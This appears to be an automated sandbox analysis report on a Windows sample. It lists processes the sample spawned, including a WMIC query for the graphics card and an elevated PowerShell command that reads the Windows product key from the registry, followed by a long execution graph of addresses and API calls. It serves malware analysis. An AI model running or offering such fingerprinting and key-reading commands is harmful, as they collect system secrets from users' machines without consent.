                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:80
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:81
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                    Imagebase:0x7ff65aee0000
                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:82
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:83
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:84
                                                                                                                                                                                                                                    Start time:13:44:30
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

Execution Graph

Execution Coverage:8.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:14.9%
Total number of Nodes:2000
Total number of Limit Nodes:34
                                                                                                                                                                                                                                      execution_graph 19549 7ff70af11720 19560 7ff70af17454 19549->19560 19562 7ff70af17461 19560->19562 19561 7ff70af0a9b8 __free_lconv_mon 11 API calls 19561->19562 19562->19561 19563 7ff70af1747d 19562->19563 19564 7ff70af0a9b8 __free_lconv_mon 11 API calls 19563->19564 19565 7ff70af11729 19563->19565 19564->19563 19566 7ff70af10348 EnterCriticalSection 19565->19566 20482 7ff70af05480 20483 7ff70af0548b 20482->20483 20491 7ff70af0f314 20483->20491 20504 7ff70af10348 EnterCriticalSection 20491->20504 18893 7ff70af0b040 18894 7ff70af0b045 18893->18894 18898 7ff70af0b05a 18893->18898 18899 7ff70af0b060 18894->18899 18900 7ff70af0b0aa 18899->18900 18901 7ff70af0b0a2 18899->18901 18903 7ff70af0a9b8 __free_lconv_mon 11 API calls 18900->18903 18902 7ff70af0a9b8 __free_lconv_mon 11 API calls 18901->18902 18902->18900 18904 7ff70af0b0b7 18903->18904 18905 7ff70af0a9b8 __free_lconv_mon 11 API calls 18904->18905 18906 7ff70af0b0c4 18905->18906 18907 7ff70af0a9b8 __free_lconv_mon 11 API calls 18906->18907 18908 7ff70af0b0d1 18907->18908 18909 7ff70af0a9b8 __free_lconv_mon 11 API calls 18908->18909 18910 7ff70af0b0de 18909->18910 18911 7ff70af0a9b8 __free_lconv_mon 11 API calls 18910->18911 18912 7ff70af0b0eb 18911->18912 18913 7ff70af0a9b8 __free_lconv_mon 11 API calls 18912->18913 18914 7ff70af0b0f8 18913->18914 18915 7ff70af0a9b8 __free_lconv_mon 11 API calls 18914->18915 18916 7ff70af0b105 18915->18916 18917 7ff70af0a9b8 __free_lconv_mon 11 API calls 18916->18917 18918 7ff70af0b115 18917->18918 18919 7ff70af0a9b8 __free_lconv_mon 11 API calls 18918->18919 18920 7ff70af0b125 18919->18920 18925 7ff70af0af04 18920->18925 18939 7ff70af10348 EnterCriticalSection 18925->18939 20515 7ff70af09dc0 20518 7ff70af09d3c 20515->20518 20525 7ff70af10348 
EnterCriticalSection 20518->20525 18727 7ff70af099d1 18728 7ff70af0a448 45 API calls 18727->18728 18729 7ff70af099d6 18728->18729 18730 7ff70af09a47 18729->18730 18731 7ff70af099fd GetModuleHandleW 18729->18731 18739 7ff70af098d4 18730->18739 18731->18730 18732 7ff70af09a0a 18731->18732 18732->18730 18753 7ff70af09af8 GetModuleHandleExW 18732->18753 18759 7ff70af10348 EnterCriticalSection 18739->18759 18754 7ff70af09b2c GetProcAddress 18753->18754 18755 7ff70af09b55 18753->18755 18756 7ff70af09b3e 18754->18756 18757 7ff70af09b5a FreeLibrary 18755->18757 18758 7ff70af09b61 18755->18758 18756->18755 18757->18758 18758->18730 19009 7ff70af1ac53 19010 7ff70af1ac63 19009->19010 19013 7ff70af054e8 LeaveCriticalSection 19010->19013 20557 7ff70af1add9 20560 7ff70af054e8 LeaveCriticalSection 20557->20560 15918 7ff70aefbb50 15919 7ff70aefbb7e 15918->15919 15920 7ff70aefbb65 15918->15920 15920->15919 15923 7ff70af0d66c 15920->15923 15924 7ff70af0d6b7 15923->15924 15928 7ff70af0d67b _get_daylight 15923->15928 15933 7ff70af04f78 15924->15933 15925 7ff70af0d69e HeapAlloc 15927 7ff70aefbbde 15925->15927 15925->15928 15928->15924 15928->15925 15930 7ff70af13600 15928->15930 15936 7ff70af13640 15930->15936 15942 7ff70af0b338 GetLastError 15933->15942 15935 7ff70af04f81 15935->15927 15941 7ff70af10348 EnterCriticalSection 15936->15941 15943 7ff70af0b379 FlsSetValue 15942->15943 15948 7ff70af0b35c 15942->15948 15944 7ff70af0b38b 15943->15944 15947 7ff70af0b369 SetLastError 15943->15947 15959 7ff70af0ec08 15944->15959 15947->15935 15948->15943 15948->15947 15950 7ff70af0b3b8 FlsSetValue 15953 7ff70af0b3c4 FlsSetValue 15950->15953 15954 7ff70af0b3d6 15950->15954 15951 7ff70af0b3a8 FlsSetValue 15952 7ff70af0b3b1 15951->15952 15966 7ff70af0a9b8 15952->15966 15953->15952 15972 7ff70af0af64 15954->15972 15960 7ff70af0ec19 _get_daylight 15959->15960 15961 7ff70af0ec6a 15960->15961 15962 7ff70af0ec4e HeapAlloc 15960->15962 15965 7ff70af13600 _get_daylight 2 API calls 15960->15965 15964 
[Execution graph residue: the Joe Sandbox control-flow graph for cmd.exe survives here only as node addresses (0x7ff70aef1000 - 0x7ff70af1ae87), edge pairs and "N API calls" counts, which carry no readable content. Recoverable information: the graph nodes resolve to CRT helpers (_get_daylight, __free_lconv_mon, _invalid_parameter_noinfo, _isindst, memcpy_s, _fread_nolock, __std_exception_destroy, __std_exception_copy, __scrt_acquire_startup_lock, __scrt_release_startup_lock, __CxxCallCatchBlock, __vcrt_FlsAlloc, _RTC_Initialize, _log10_special, __crtLCMapStringW, fegetenv) and to the following Windows API calls: RtlFreeHeap, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeSListHead, IsProcessorFeaturePresent, GetStartupInfoW, GetModuleFileNameW, GetModuleHandleW, SetDllDirectoryW, LoadLibraryExW, FreeLibrary, GetProcAddress, TlsFree, FlsGetValue, FlsSetValue, PostMessageW, GetMessageW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FindFirstFileExW, FindClose, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetCurrentProcess, GetCurrentProcessId, OpenProcessToken, LocalFree, GetTempPathW, MultiByteToWideChar, WideCharToMultiByte, FormatMessageW, MessageBoxW, TerminateProcess.]
17077 7ff70af04bba 17075->17077 17076 7ff70af04b58 17076->17069 17076->17074 17079 7ff70af0a9b8 __free_lconv_mon 11 API calls 17077->17079 17078->17068 17079->17068 17081 7ff70af0b338 _get_daylight 11 API calls 17080->17081 17082 7ff70af051e7 17081->17082 17083 7ff70aef29e5 17082->17083 17084 7ff70af0ec08 _get_daylight 11 API calls 17082->17084 17087 7ff70af05227 17082->17087 17083->17024 17085 7ff70af0521c 17084->17085 17086 7ff70af0a9b8 __free_lconv_mon 11 API calls 17085->17086 17086->17087 17087->17083 17239 7ff70af0ec90 17087->17239 17090 7ff70af0a970 _isindst 17 API calls 17091 7ff70af0526c 17090->17091 17093 7ff70aef262f 17092->17093 17094 7ff70aef9400 2 API calls 17093->17094 17095 7ff70aef2660 17094->17095 17096 7ff70aef2683 MessageBoxA 17095->17096 17097 7ff70aef266f MessageBoxW 17095->17097 17098 7ff70aef2690 17096->17098 17097->17098 17099 7ff70aefc5c0 _log10_special 8 API calls 17098->17099 17100 7ff70aef26a0 17099->17100 17100->17028 17102 7ff70af02cbe 17101->17102 17103 7ff70af02cae 17101->17103 17104 7ff70af02cc7 17102->17104 17111 7ff70af02cf5 17102->17111 17105 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17103->17105 17106 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17104->17106 17107 7ff70af02ced 17105->17107 17106->17107 17107->17069 17107->17074 17107->17075 17107->17076 17108 7ff70af04830 45 API calls 17108->17111 17110 7ff70af02fa4 17113 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17110->17113 17111->17103 17111->17107 17111->17108 17111->17110 17115 7ff70af03610 17111->17115 17141 7ff70af032d8 17111->17141 17171 7ff70af02b60 17111->17171 17113->17103 17116 7ff70af036c5 17115->17116 17117 7ff70af03652 17115->17117 17120 7ff70af0371f 17116->17120 17121 7ff70af036ca 17116->17121 17118 7ff70af036ef 17117->17118 17119 7ff70af03658 17117->17119 17188 7ff70af01bc0 17118->17188 17128 7ff70af0365d 17119->17128 17132 7ff70af0372e 17119->17132 17120->17118 17120->17132 17139 7ff70af03688 17120->17139 17122 7ff70af036ff 
17121->17122 17123 7ff70af036cc 17121->17123 17195 7ff70af017b0 17122->17195 17125 7ff70af0366d 17123->17125 17131 7ff70af036db 17123->17131 17140 7ff70af0375d 17125->17140 17174 7ff70af03f74 17125->17174 17128->17125 17129 7ff70af036a0 17128->17129 17128->17139 17129->17140 17184 7ff70af04430 17129->17184 17131->17118 17134 7ff70af036e0 17131->17134 17132->17140 17202 7ff70af01fd0 17132->17202 17137 7ff70af045c8 37 API calls 17134->17137 17134->17140 17135 7ff70aefc5c0 _log10_special 8 API calls 17136 7ff70af039f3 17135->17136 17136->17111 17137->17139 17139->17140 17209 7ff70af0e8c8 17139->17209 17140->17135 17142 7ff70af032e3 17141->17142 17143 7ff70af032f9 17141->17143 17144 7ff70af036c5 17142->17144 17145 7ff70af03652 17142->17145 17146 7ff70af03337 17142->17146 17143->17146 17147 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17143->17147 17150 7ff70af0371f 17144->17150 17151 7ff70af036ca 17144->17151 17148 7ff70af036ef 17145->17148 17149 7ff70af03658 17145->17149 17146->17111 17147->17146 17154 7ff70af01bc0 38 API calls 17148->17154 17158 7ff70af0365d 17149->17158 17160 7ff70af0372e 17149->17160 17150->17148 17150->17160 17168 7ff70af03688 17150->17168 17152 7ff70af036ff 17151->17152 17153 7ff70af036cc 17151->17153 17156 7ff70af017b0 38 API calls 17152->17156 17155 7ff70af0366d 17153->17155 17162 7ff70af036db 17153->17162 17154->17168 17157 7ff70af03f74 47 API calls 17155->17157 17170 7ff70af0375d 17155->17170 17156->17168 17157->17168 17158->17155 17159 7ff70af036a0 17158->17159 17158->17168 17163 7ff70af04430 47 API calls 17159->17163 17159->17170 17161 7ff70af01fd0 38 API calls 17160->17161 17160->17170 17161->17168 17162->17148 17164 7ff70af036e0 17162->17164 17163->17168 17167 7ff70af045c8 37 API calls 17164->17167 17164->17170 17165 7ff70aefc5c0 _log10_special 8 API calls 17166 7ff70af039f3 17165->17166 17166->17111 17167->17168 17169 7ff70af0e8c8 47 API calls 17168->17169 17168->17170 17169->17168 17170->17165 17222 7ff70af00d84 17171->17222 
17175 7ff70af03f96 17174->17175 17176 7ff70af00bf0 12 API calls 17175->17176 17177 7ff70af03fde 17176->17177 17178 7ff70af0e5e0 46 API calls 17177->17178 17180 7ff70af040b1 17178->17180 17179 7ff70af040d3 17182 7ff70af0415c 17179->17182 17183 7ff70af04830 45 API calls 17179->17183 17180->17179 17181 7ff70af04830 45 API calls 17180->17181 17181->17179 17182->17139 17183->17182 17185 7ff70af044b0 17184->17185 17186 7ff70af04448 17184->17186 17185->17139 17186->17185 17187 7ff70af0e8c8 47 API calls 17186->17187 17187->17185 17189 7ff70af01bf3 17188->17189 17190 7ff70af01c22 17189->17190 17192 7ff70af01cdf 17189->17192 17191 7ff70af00bf0 12 API calls 17190->17191 17194 7ff70af01c5f 17190->17194 17191->17194 17193 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17192->17193 17193->17194 17194->17139 17196 7ff70af017e3 17195->17196 17197 7ff70af01812 17196->17197 17199 7ff70af018cf 17196->17199 17198 7ff70af00bf0 12 API calls 17197->17198 17201 7ff70af0184f 17197->17201 17198->17201 17200 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17199->17200 17200->17201 17201->17139 17203 7ff70af02003 17202->17203 17204 7ff70af02032 17203->17204 17206 7ff70af020ef 17203->17206 17205 7ff70af00bf0 12 API calls 17204->17205 17208 7ff70af0206f 17204->17208 17205->17208 17207 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17206->17207 17207->17208 17208->17139 17210 7ff70af0e8f0 17209->17210 17211 7ff70af0e935 17210->17211 17213 7ff70af04830 45 API calls 17210->17213 17215 7ff70af0e8f5 memcpy_s 17210->17215 17218 7ff70af0e91e memcpy_s 17210->17218 17211->17215 17211->17218 17219 7ff70af10858 17211->17219 17212 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17212->17215 17213->17211 17215->17139 17218->17212 17218->17215 17221 7ff70af1087c WideCharToMultiByte 17219->17221 17223 7ff70af00dc3 17222->17223 17224 7ff70af00db1 17222->17224 17226 7ff70af00e0d 17223->17226 17228 7ff70af00dd0 17223->17228 17225 7ff70af04f78 _get_daylight 11 API calls 17224->17225 17227 
7ff70af00db6 17225->17227 17231 7ff70af00eb6 17226->17231 17232 7ff70af04f78 _get_daylight 11 API calls 17226->17232 17229 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17227->17229 17230 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17228->17230 17236 7ff70af00dc1 17229->17236 17230->17236 17233 7ff70af04f78 _get_daylight 11 API calls 17231->17233 17231->17236 17234 7ff70af00eab 17232->17234 17235 7ff70af00f60 17233->17235 17237 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17234->17237 17238 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17235->17238 17236->17111 17237->17231 17238->17236 17244 7ff70af0ecad 17239->17244 17240 7ff70af0ecb2 17241 7ff70af0524d 17240->17241 17242 7ff70af04f78 _get_daylight 11 API calls 17240->17242 17241->17083 17241->17090 17243 7ff70af0ecbc 17242->17243 17245 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17243->17245 17244->17240 17244->17241 17246 7ff70af0ecfc 17244->17246 17245->17241 17246->17241 17247 7ff70af04f78 _get_daylight 11 API calls 17246->17247 17247->17243 17249 7ff70aef8823 __std_exception_destroy 17248->17249 17250 7ff70aef87a1 GetTokenInformation 17248->17250 17253 7ff70aef8836 CloseHandle 17249->17253 17254 7ff70aef883c 17249->17254 17251 7ff70aef87c2 GetLastError 17250->17251 17252 7ff70aef87cd 17250->17252 17251->17249 17251->17252 17252->17249 17255 7ff70aef87e9 GetTokenInformation 17252->17255 17253->17254 17254->16298 17255->17249 17256 7ff70aef880c 17255->17256 17256->17249 17257 7ff70aef8816 ConvertSidToStringSidW 17256->17257 17257->17249 17259 7ff70aefc8c0 17258->17259 17260 7ff70aef2b74 GetCurrentProcessId 17259->17260 17261 7ff70aef26b0 48 API calls 17260->17261 17262 7ff70aef2bc7 17261->17262 17263 7ff70af04c48 48 API calls 17262->17263 17264 7ff70aef2c10 MessageBoxW 17263->17264 17265 7ff70aefc5c0 _log10_special 8 API calls 17264->17265 17266 7ff70aef2c40 17265->17266 17266->16309 17268 7ff70aef25e5 17267->17268 17269 7ff70af04c48 48 API calls 17268->17269 17270 
7ff70aef2604 17269->17270 17270->16317 17316 7ff70af08804 17271->17316 17275 7ff70aef81cc 17274->17275 17276 7ff70aef9400 2 API calls 17275->17276 17277 7ff70aef81eb 17276->17277 17278 7ff70aef8206 ExpandEnvironmentStringsW 17277->17278 17279 7ff70aef81f3 17277->17279 17281 7ff70aef822c __std_exception_destroy 17278->17281 17280 7ff70aef2810 49 API calls 17279->17280 17282 7ff70aef81ff __std_exception_destroy 17280->17282 17283 7ff70aef8230 17281->17283 17286 7ff70aef8243 17281->17286 17284 7ff70aefc5c0 _log10_special 8 API calls 17282->17284 17285 7ff70aef2810 49 API calls 17283->17285 17287 7ff70aef839f 17284->17287 17285->17282 17288 7ff70aef8251 GetDriveTypeW 17286->17288 17289 7ff70aef82af 17286->17289 17287->16327 17306 7ff70af082a8 17287->17306 17293 7ff70aef8285 17288->17293 17294 7ff70aef82a0 17288->17294 17454 7ff70af07e78 17289->17454 17292 7ff70aef82c1 17295 7ff70aef82c9 17292->17295 17299 7ff70aef82dc 17292->17299 17296 7ff70aef2810 49 API calls 17293->17296 17447 7ff70af079dc 17294->17447 17298 7ff70aef2810 49 API calls 17295->17298 17296->17282 17298->17282 17300 7ff70aef833e CreateDirectoryW 17299->17300 17301 7ff70aef26b0 48 API calls 17299->17301 17300->17282 17302 7ff70aef834d GetLastError 17300->17302 17303 7ff70aef8318 CreateDirectoryW 17301->17303 17302->17282 17303->17299 17307 7ff70af082c8 17306->17307 17308 7ff70af082b5 17306->17308 17555 7ff70af07f2c 17307->17555 17310 7ff70af04f78 _get_daylight 11 API calls 17308->17310 17312 7ff70af082ba 17310->17312 17314 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17312->17314 17313 7ff70af082c6 17313->16325 17314->17313 17357 7ff70af115c8 17316->17357 17416 7ff70af11340 17357->17416 17437 7ff70af10348 EnterCriticalSection 17416->17437 17448 7ff70af079fa 17447->17448 17451 7ff70af07a2d 17447->17451 17448->17451 17466 7ff70af104e4 17448->17466 17451->17282 17452 7ff70af0a970 _isindst 17 API calls 17453 7ff70af07a5d 17452->17453 17455 7ff70af07e94 17454->17455 17456 7ff70af07f02 17454->17456 
17455->17456 17458 7ff70af07e99 17455->17458 17500 7ff70af10830 17456->17500 17459 7ff70af07eb1 17458->17459 17460 7ff70af07ece 17458->17460 17475 7ff70af07c48 GetFullPathNameW 17459->17475 17483 7ff70af07cbc GetFullPathNameW 17460->17483 17465 7ff70af07ec6 __std_exception_destroy 17465->17292 17467 7ff70af104fb 17466->17467 17468 7ff70af104f1 17466->17468 17469 7ff70af04f78 _get_daylight 11 API calls 17467->17469 17468->17467 17473 7ff70af10517 17468->17473 17470 7ff70af10503 17469->17470 17471 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17470->17471 17472 7ff70af07a29 17471->17472 17472->17451 17472->17452 17473->17472 17474 7ff70af04f78 _get_daylight 11 API calls 17473->17474 17474->17470 17476 7ff70af07c6e GetLastError 17475->17476 17478 7ff70af07c84 17475->17478 17477 7ff70af04eec _fread_nolock 11 API calls 17476->17477 17480 7ff70af07c7b 17477->17480 17479 7ff70af07c80 17478->17479 17482 7ff70af04f78 _get_daylight 11 API calls 17478->17482 17479->17465 17481 7ff70af04f78 _get_daylight 11 API calls 17480->17481 17481->17479 17482->17479 17484 7ff70af07cef GetLastError 17483->17484 17489 7ff70af07d05 __std_exception_destroy 17483->17489 17485 7ff70af04eec _fread_nolock 11 API calls 17484->17485 17486 7ff70af07cfc 17485->17486 17487 7ff70af04f78 _get_daylight 11 API calls 17486->17487 17488 7ff70af07d01 17487->17488 17491 7ff70af07d94 17488->17491 17489->17488 17490 7ff70af07d5f GetFullPathNameW 17489->17490 17490->17484 17490->17488 17492 7ff70af07dbd memcpy_s 17491->17492 17493 7ff70af07e08 memcpy_s 17491->17493 17492->17493 17494 7ff70af07df1 17492->17494 17497 7ff70af07e2a 17492->17497 17493->17465 17495 7ff70af04f78 _get_daylight 11 API calls 17494->17495 17496 7ff70af07df6 17495->17496 17497->17493 17499 7ff70af04f78 _get_daylight 11 API calls 17497->17499 17499->17496 17503 7ff70af10640 17500->17503 17504 7ff70af1066b 17503->17504 17505 7ff70af10682 17503->17505 17506 7ff70af04f78 _get_daylight 11 API calls 17504->17506 17507 7ff70af106a7 
17505->17507 17508 7ff70af10686 17505->17508 17510 7ff70af10670 17506->17510 17541 7ff70af0f628 17507->17541 17529 7ff70af107ac 17508->17529 17514 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17510->17514 17512 7ff70af106ac 17518 7ff70af1067b __std_exception_destroy 17514->17518 17515 7ff70af1068f 17521 7ff70aefc5c0 _log10_special 8 API calls 17518->17521 17524 7ff70af107a1 17521->17524 17524->17465 17530 7ff70af107f6 17529->17530 17531 7ff70af107c6 17529->17531 17533 7ff70af10801 GetDriveTypeW 17530->17533 17535 7ff70af107e1 17530->17535 17532 7ff70af04f58 _fread_nolock 11 API calls 17531->17532 17534 7ff70af107cb 17532->17534 17533->17535 17536 7ff70af04f78 _get_daylight 11 API calls 17534->17536 17537 7ff70aefc5c0 _log10_special 8 API calls 17535->17537 17538 7ff70af107d6 17536->17538 17539 7ff70af1068b 17537->17539 17540 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17538->17540 17539->17512 17539->17515 17540->17535 17542 7ff70af1a540 memcpy_s 17541->17542 17543 7ff70af0f65e GetCurrentDirectoryW 17542->17543 17544 7ff70af0f69c 17543->17544 17545 7ff70af0f675 17543->17545 17546 7ff70af0ec08 _get_daylight 11 API calls 17544->17546 17547 7ff70aefc5c0 _log10_special 8 API calls 17545->17547 17548 7ff70af0f6ab 17546->17548 17549 7ff70af0f709 17547->17549 17549->17512 17562 7ff70af10348 EnterCriticalSection 17555->17562 17564 7ff70aef455a 17563->17564 17565 7ff70aef9400 2 API calls 17564->17565 17566 7ff70aef457f 17565->17566 17567 7ff70aefc5c0 _log10_special 8 API calls 17566->17567 17568 7ff70aef45a7 17567->17568 17568->16365 17571 7ff70aef7e1e 17569->17571 17570 7ff70aef7f42 17573 7ff70aefc5c0 _log10_special 8 API calls 17570->17573 17571->17570 17572 7ff70aef1c80 49 API calls 17571->17572 17576 7ff70aef7ea5 17572->17576 17574 7ff70aef7f73 17573->17574 17574->16365 17575 7ff70aef1c80 49 API calls 17575->17576 17576->17570 17576->17575 17577 7ff70aef4550 10 API calls 17576->17577 17578 7ff70aef7efb 17576->17578 17577->17576 17579 7ff70aef9400 2 API 
calls 17578->17579 17580 7ff70aef7f13 CreateDirectoryW 17579->17580 17580->17570 17580->17576 17582 7ff70aef1613 17581->17582 17583 7ff70aef1637 17581->17583 17702 7ff70aef1050 17582->17702 17585 7ff70aef45b0 108 API calls 17583->17585 17587 7ff70aef164b 17585->17587 17586 7ff70aef1618 17588 7ff70aef162e 17586->17588 17592 7ff70aef2710 54 API calls 17586->17592 17589 7ff70aef1653 17587->17589 17590 7ff70aef1682 17587->17590 17588->16365 17593 7ff70af04f78 _get_daylight 11 API calls 17589->17593 17591 7ff70aef45b0 108 API calls 17590->17591 17594 7ff70aef1696 17591->17594 17592->17588 17595 7ff70aef1658 17593->17595 17596 7ff70aef169e 17594->17596 17597 7ff70aef16b8 17594->17597 17598 7ff70aef2910 54 API calls 17595->17598 17599 7ff70aef2710 54 API calls 17596->17599 17600 7ff70af00744 73 API calls 17597->17600 17601 7ff70aef1671 17598->17601 17602 7ff70aef16ae 17599->17602 17603 7ff70aef16cd 17600->17603 17601->16365 17606 7ff70af000bc 74 API calls 17602->17606 17604 7ff70aef16d1 17603->17604 17605 7ff70aef16f9 17603->17605 17607 7ff70af04f78 _get_daylight 11 API calls 17604->17607 17608 7ff70aef16ff 17605->17608 17609 7ff70aef1717 17605->17609 17610 7ff70aef1829 17606->17610 17611 7ff70aef16d6 17607->17611 17680 7ff70aef1210 17608->17680 17614 7ff70aef1739 17609->17614 17624 7ff70aef1761 17609->17624 17610->16365 17613 7ff70aef2910 54 API calls 17611->17613 17620 7ff70aef16ef __std_exception_destroy 17613->17620 17616 7ff70af04f78 _get_daylight 11 API calls 17614->17616 17615 7ff70af000bc 74 API calls 17615->17602 17617 7ff70aef173e 17616->17617 17618 7ff70aef2910 54 API calls 17617->17618 17618->17620 17619 7ff70af0040c _fread_nolock 53 API calls 17619->17624 17620->17615 17621 7ff70aef17da 17622 7ff70af04f78 _get_daylight 11 API calls 17621->17622 17625 7ff70aef17ca 17622->17625 17624->17619 17624->17620 17624->17621 17626 7ff70aef17c5 17624->17626 17733 7ff70af00b4c 17624->17733 17628 7ff70aef2910 54 API calls 17625->17628 17627 7ff70af04f78 _get_daylight 11 
API calls 17626->17627 17627->17625 17628->17620 17630 7ff70aef717b 17629->17630 17632 7ff70aef7134 17629->17632 17630->16365 17632->17630 17766 7ff70af05094 17632->17766 17634 7ff70aef4191 17633->17634 17635 7ff70aef44d0 49 API calls 17634->17635 17636 7ff70aef41cb 17635->17636 17637 7ff70aef44d0 49 API calls 17636->17637 17638 7ff70aef41db 17637->17638 17639 7ff70aef41fd 17638->17639 17640 7ff70aef422c 17638->17640 17797 7ff70aef4100 17639->17797 17642 7ff70aef4100 51 API calls 17640->17642 17643 7ff70aef422a 17642->17643 17644 7ff70aef428c 17643->17644 17645 7ff70aef4257 17643->17645 17646 7ff70aef4100 51 API calls 17644->17646 17804 7ff70aef7ce0 17645->17804 17648 7ff70aef42b0 17646->17648 17651 7ff70aef4100 51 API calls 17648->17651 17663 7ff70aef4302 17648->17663 17650 7ff70aef2710 54 API calls 17655 7ff70aef4287 17650->17655 17657 7ff70aef42d9 17651->17657 17652 7ff70aef4383 17654 7ff70aef1950 115 API calls 17652->17654 17653 7ff70aefc5c0 _log10_special 8 API calls 17656 7ff70aef4425 17653->17656 17658 7ff70aef438d 17654->17658 17655->17653 17656->16365 17659 7ff70aef4100 51 API calls 17657->17659 17657->17663 17660 7ff70aef4395 17658->17660 17661 7ff70aef43ee 17658->17661 17659->17663 17830 7ff70aef1840 17660->17830 17664 7ff70aef2710 54 API calls 17661->17664 17662 7ff70aef437c 17662->17660 17665 7ff70aef4307 17662->17665 17663->17652 17663->17662 17663->17665 17667 7ff70aef436b 17663->17667 17664->17665 17672 7ff70aef2710 54 API calls 17665->17672 17671 7ff70aef2710 54 API calls 17667->17671 17669 7ff70aef43c2 17674 7ff70aef1600 118 API calls 17669->17674 17670 7ff70aef43ac 17673 7ff70aef2710 54 API calls 17670->17673 17671->17665 17672->17655 17673->17655 17675 7ff70aef43d0 17674->17675 17675->17655 17676 7ff70aef2710 54 API calls 17675->17676 17676->17655 17678 7ff70aef1c80 49 API calls 17677->17678 17679 